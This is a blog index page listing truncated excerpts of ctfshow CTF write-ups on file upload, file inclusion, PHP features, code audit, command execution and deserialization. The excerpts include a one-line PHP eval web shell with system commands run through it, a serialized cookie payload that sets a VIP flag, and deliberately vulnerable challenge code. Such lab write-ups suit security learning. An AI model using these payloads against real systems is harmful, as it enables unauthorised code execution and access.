[ctfshow] file upload web151-170 wp

web151 1. Write a sentence and upload it. It is found that the front end has verification. <?php @eval($_POST[1]);?> Directly press F12. 2. Modify the front-end verification. You can upload successfully. 3. Find the flag with AntSword. //Common commands: 1=system("ls /"); //Find root directory 1=system("ls ./"); //Find c ...

Posted by Juan Dela Cruz on Sat, 26 Feb 2022 15:55:08 +0100

[CTFshow] file inclusion web78-web81

web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } See the include function in the source code. This means that the php file is imported from the outside and executed. If the execution is unsuccessful, the source code of the file is returned. The GET parameter of the file ...

Posted by pineapple1 on Fri, 25 Feb 2022 15:16:21 +0100

ctfshow php features web89-web115 web123-150 wp

php features. The reference blog is still Nanshen's blog. web89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } Here is an intval function: get the integer value of the variab ...

Posted by Garcia on Thu, 03 Feb 2022 16:02:35 +0100

ctfshow code audit web301-web310 wp

There may be a lot of nonsense. It mainly records the process of finding loopholes from so many files. Reference blogs: https://blog.csdn.net/rfrder/article/details/113924013 https://blog.csdn.net/miuzzx/article/details/111352849 https://rainy-autumn.top/archives/913 web301 Audit the loopholes written by the group leader three years ago se ...

Posted by greekhand on Thu, 03 Feb 2022 07:00:52 +0100

ctfshow command execution web29-web77 web118-122 web124 wp

Nanshen's blog. Command execution web29 preg_match: match a regular expression. The "i" after the pattern delimiter marks this as a case-insensitive search. The \b in the pattern marks a word boundary, so only independent words will be matched, such as: if (preg_match("/\bweb\b/i", "PHP is the web scripting language of choice.")) : True if (preg_matc ...

Posted by rodin on Wed, 02 Feb 2022 22:16:41 +0100

ctfshow: On deserialization

web254 ?username=xxxxxx&password=xxxxxx web255 cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D web256 cookie: O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A8%3A%22password%22 ...

Posted by squimmy on Sat, 30 Oct 2021 17:44:41 +0200